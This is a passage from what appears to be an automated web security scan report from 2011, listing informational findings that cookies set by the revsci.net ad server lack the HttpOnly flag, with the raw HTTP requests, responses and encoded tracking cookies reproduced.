Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 1315

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
10.19. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I10982 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_--QM="MLsXrqMOJjhroJB0OsFGTywSQa5gE3bzGLWC77EYlL0V6PUwpFqMKfRo/WIjxatotGUBLfh18Iw7W+qkAQ46bVHoTrv1pQwNKjjgNCNHJPbpAgH4IzR/+iRbVue91oXW/jKsDPa7vbvxtrd33fHq34yrFQuJku+bgm+8EVffudcKN4iuBvrN90qHeI4xaY/Q1W1yNsL5KOlsGxNqhUiNOXe5nn986aJ67S/0tULtWPdrG3lhpPsdb8xO/n/lB581aDn762WB0ihbZBOeu3Ufx+HpLRh+8Hbf0zZq8pfGKCS0hlRrIAabwnKXGJwRIMywuWQPjThCbo0KSSFQIP4mo76IAHMZnYNH0tuqRyB/AEZngSZCLfLYF3Zs5g4nZoGO0cohFtEneaCcGDtskRpSY+dP7h0gnUP0L7R7A/8xlqSZ/W2KkRpVIhjwQAOTk48sJD1PxXjX0x5XdtsfLihcm9VuIUiHpGRUF7F/idal7Hq+0pROgbBT6KCcol1snnTV0V5F0xpBZk6CRy2ugCPvNan6L1McQFvgbXEKldtpFMfuZakR635XR4x1RXCLCkkxUCfQPGc6mBZWiKgoRHEO3b0otALBdNCIIFAiSKxefi0nPrtknQ3EMXhwwvPIzXKIQsOaoEWNpAIcShIHiDOF3qSKWFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/ueqaVRMDxCeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM4m41UyM+T7FSi5tA/qwqOwo4kK2gHpUVKssP2I+Ee7LhGobkwOJUOMfgbzVozWgQuSKoq5kZ88M185NbAGUupiqDKHqMcj+dBKc9fPP3KK+5EXLdrvEPS5YK+cSdBxxlTzlrYRJ3wJXAiV2dnrBaaQP+zIJOpgPpvL1xtxxrkjB56lwuYrzB2bgI6uI/AireNneSB71/kJavLpmOV3ZKyXlMBYkfyXB8qTG0Uev1gg9C57Wn8epqz8lCu0573dEnu71OAvS2jhxt+Kw6FPI+tTiLCxWwwjS81QgDUZk9v3k6axNYh2OWMWlOaV+U8pWNdAebenCcqc="; rsi_us_1000000="pUM1Iz9HMAYU1O2uQ6agQvHtomeq75Ig4g4EmJ/A6n4WsknjQhUq8iBul7F68iFx8cqm3SO9eaFvyn1GBw/eJPslZlA8PhpTTZGsXb7RjDc/iMgnjkeolupj4fLTEQPVKscYxoDVuEdJuZbaK3D9xPuOIhlowTJ+ya38j5p4Ta6Bz/HWeH0nosUPna7vHxaZ5XoL5l/dnmXwpPm5VWpbUOslRA5BxSe4ZOkSE9PAmD2iQJPexlX0wmcIAbK7tsGmzGATNf80Fqyl751/l8juNUu0JNYEx45nWIRv/C8BOiTiJbO5g8IGAzpcI40V+UQZmhqEPeeEc1fCQnI0TCPjgkID7R2wwigMSHt5VUBgTb+NyMxPLwLONDY3TuokJnmzHPnnRDkuVRiS5+Uyz4YpGNKGlhaPSdZ9n4EB3wX0uvpMSNK4Fmo9jIaSj+ncTHidAXiIgQDfusP6TCa9QdU2bznEQzcv9BCophz20fJ1WW+kENTBipABVnZA56YjECEEY3phD1JQzHGdVrVseyuEk6GWi92FSiGLJ4812+Br34U7q3VQBxTRSEt04mb9b+Nu053VTtbctHkK68djsAFkE74d8kPDFLOH8lRboZwLXX6HqUXD02RKMs5PWsH+ziouWDQYmVb8hZ/ecArQiVYBI4aPw+kfQuXmbioB2aEC0lxOEpHD/Ns9MsBpCzc5UqHnCYeRcpcYLhhYm4BPjPFrgYw8D4NABb/5+fzD8h2U3LvMxcVcLWdaMX4aKoPVH+KL74p/EdmylBc1de/czv/dSpACqyj0uifAEyPR50aV9cwCBjohIoFo9EOMVH6RMd7onZ55R4I4FSIgeCRK0c4wgNxjTMXno77nWOf381e4nnQbO463zH1b2jgH0FmsgwCxBKR5LsbHEUqdx0oVuJzssP3YK75lqpQheuu3QYCc6leVSJ0morqXGrRuMXQbQrgyVMCQgz3qL/OFP/kN/cJMZe6ViH5t1Gdp7bjk4yCudY/fH/RWKgw9ywS7g4LBjxX2XrVDkyrkyMkUeGj92tKDN3nwYWN2isOHQc0tZtLOL/8WEUOseW6PUtOc7HPHXkhurCilOyFhqPwtVkrNV9iwiE6/OEwXFDX/aXR9ceCoOAiQkffNc/FhNzpBQE1u8u3E6JnrXkfFsNN0SqpfDvGaQnlA5yxO+k/zo/hv8QT1f8yC4/H0b0V3oZQU62XPrD2wB5Kv4sv8RmzGKE7qz8BL2mQX29agkU8ECTuBwmAb6UIzgDgLdezAM7zWMEN9lNvnbyEhVz4KlJteKeaP6JM8QWkSqGwqE4JwqHmmDFepCsQRHRGrBiMwJA76NRpMK59CxAt0fbzHEYqA+JmFKmMDiGhSr7vA0le7ggiHcPnY4yw16dWwbcJEsbg9ulXJ4JGMYgnw7KoKzVD4RSJBC230sX+mBeGHoQSxN08MTZ+4NCxPZspf/4y9JLqybhHYnhyK+r/gBv5lHBLh2Qjg3gH9Ms4jvQ6ewPsqEIGFdCBtnIuWzVKiX5T6glm3a6fLZrlR/OoU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_--QM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7Gnt="MLsXrqEO5ihr4JB0esFCP3iNF+pqmlub49aGmOkZz5qg3MoTcqeWbmliBEBiXf5iQVJEExBOdq4FjLd2iQGfFfRL/ql3vrzlT19lOKExbhBpGeSZT/oLCk2e4ffVgY0aDJ1uvtvUub/FrtByJKJuLfZer6ZFcp297ersMcCKWDghV0ndvnIp0ubN9s+L4XcV4gqUaLHaTBCzh59PWcCdqx5qql2sm+3+Fsp134KHZC+10dxmr/h2YPgrCQqlE1efdhVBy1mZ7UI9etUD9Q2vo2HKLKfq9HTRcMF7gvVBk6CX9dJqUNISrnFRzxK9I16Ze3gfnZMoYTvLGxzAujjGYgCBQHydRq3NVcxWHFqhjRyDYKMOimyVpBK/ej4cUFyMPuBapiZYAS+rRHNi2ReS4mBcOdI+kc0Sund6Oo8hlry4ImUOmhdRINCA6C7zqOTFINl5xGgXWwxPdANsISvg71h8oO6xP2wQVtZweTd2T3K400B4YdU0OCBbecxvUFE5I4HLNnVvO62maFGwXjcgxZKAa5SsW8dHk66Y8GjRMAd94ILbDGnKfs4wZh2R1y74X41joKW4WyD6hz1th/jdD24csANgpYVTf+WvMJhk1XuGdB6Vk+pz2NkjdsC8jwl3PNW7yoxWnby31j++1k5brdu2yrelw8/600dTtJ3lbwNhQ8ZUclNZ1PsBaUFiBUyiyKvQ/P8KE/i9La90q8j9I0CiOV/wwv7LKH1NeeF7MZAWFMOky8fZGQEYBHHqHh9HItYcPRDJHYaAKfPXRfVi4xpD3YJaeN9hBgfCu1SVahEpxVEQAokzPDcGLmCaxJqxlQqLLbD8hW1oHweNYdgZUHp5QuKXDFYpUoZLVaqngTPm5fO1BA8OSKZDjMsQ7Fe1GUPgTzic8rAfX1VwOlHBDBDTT3SuyF8e7ai7LUsohv0VtOqoZvYupIjAFDPeAac5Rc3MXPsEPgOLDDba3hNstl+qzh6YnF2zZ/ikkzOk+kEjNEJwcyXDQP/6gF24TmkWLEwF4enQzCwKzN7gC11i85xkhK0/fqO5EaF1RsVX3c+rfizRIYPFcsw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUNFIz1H8Bcc1M2QQ6eoQtXsImOq5xMg6w5HyyqatgLAr7yjOUThNYktpeAHrY+3W/Rk6NTESS4BwdCr1eHt/9ZkNKrCo6s3fabpmNBDwjRy3TGbk1xeK9kSMFgtwIuKczX4GzBspBjAuZwMmhoplDJh7A9z6RiBOinwtBeHiVcN0i6v6Gm1sxfd5xp1wuCF5WZs9kbwlWvr4NZ3g93GtCPa+q1U3LVpSvRK0UuludpVgBkLBr6GmT6i4WYYMVSbP5sllrENJ/vgWFptkkKA7v52VrZ6nH3vXNoHtOYAS2yJ/FfDyNCCwb6Rxtu5T0QGEEygc1Vek+zD8vsvm9Z7ts8y8DzrWIA+L6QbtLqvJ1Cu2xPMZlUdb1O4zSJ4vc7AcDWyHZMX8gZj5tAemXjKW8wO3jOPJ7SmwxzcAo3WdFavBofRh8t0E3uHrsAcrQpcSPbVqbGt1e3/UyCFwCzFUuTUmlrNmPxLnvnZmtxVaM9316IQRVs837aGn0ks1oedN0p6hUxDsaJ5ZBVmHNpHHdeedyHrWjyJ/1wyX4wJNVgeXnsM6ilSJ3Ehvf4UokF6eCfynXmVi5tEPblDsKdz0gLUKCQ7cr6/s6b69jA8zc9QRWdxKca2+RWxPviS6c2h8wrj2rf0tEuORJ+Uwb4rey9qg25EyXxss4pPjjnAeJPw3/YUbvxzjKPX3JmMyogSlfJWxMxdcQbHoHZ3cnZ8CMXsUBZo05Zu82Flj6Tc5xYaiJg+9o4I3Ey7XhuyLiwT+eQRLlYwuETrot957yBew0Fkj4RBLqUmAXrvKhR4XNwVEz7IrlWvUBo7qrGSAA4dV4jLZ4SCzPY2e4jS5ZlzqWWkpG84+clO4BXnB8T5fSwN1hMufzM8cWn5qssUwcRHMfxSMzEQnVELAXWCD8XnFM+O7bXi4tiDjcdFxbASSHfZ0DPfirZ0GrtvPfp4GUxJ4EUP+Q7f0JGdYf85bX7yQR8UTpizWaDf4nx9WmSWQZBYoaRX4DPO8mDn02s2/XeR66dS3pVwhC/nBXLMs+noD9+3NjceioQX93XzXW+hZpbrmpDbxL1My5MSRv1RW1FbhrAV0YFG9Hrw5avHRu2vgsXJwtswcKQduxCXN3reGFDYnE/twZvGMzFBwE1u7u1EapnsTifVMDN1TqhDHs4EQZlCK8dfAamWdz2neAXn7Ag2QqcwNPO3UXWSBKDhR2XfX9GpGrRip1xv3ueUAiS6sEHA273xIgUgU6sdyErUVLQlqA1SGUq49shVhg8wrY3AEtHacnZrP3WYzFgPaFMrp37rlYYy8zb0Scsdi6aQPsE9Urkf1agfH0Uty6V30sefD+k2ZMM2eNWsW6oKjWcTeeU85I6hwZmo+dvhtl0gi4GgJH2E3QBQfS8RoKgYr8TZ0GBaDo2K/Zj7eWLxDGt0it+hDeFnGhRSYPFLVEKrcTnbp+N+ufxGpgs42aKc47x3NAkbyo4UlDHYpZ8R6Hg+Iw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...
10.20. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; 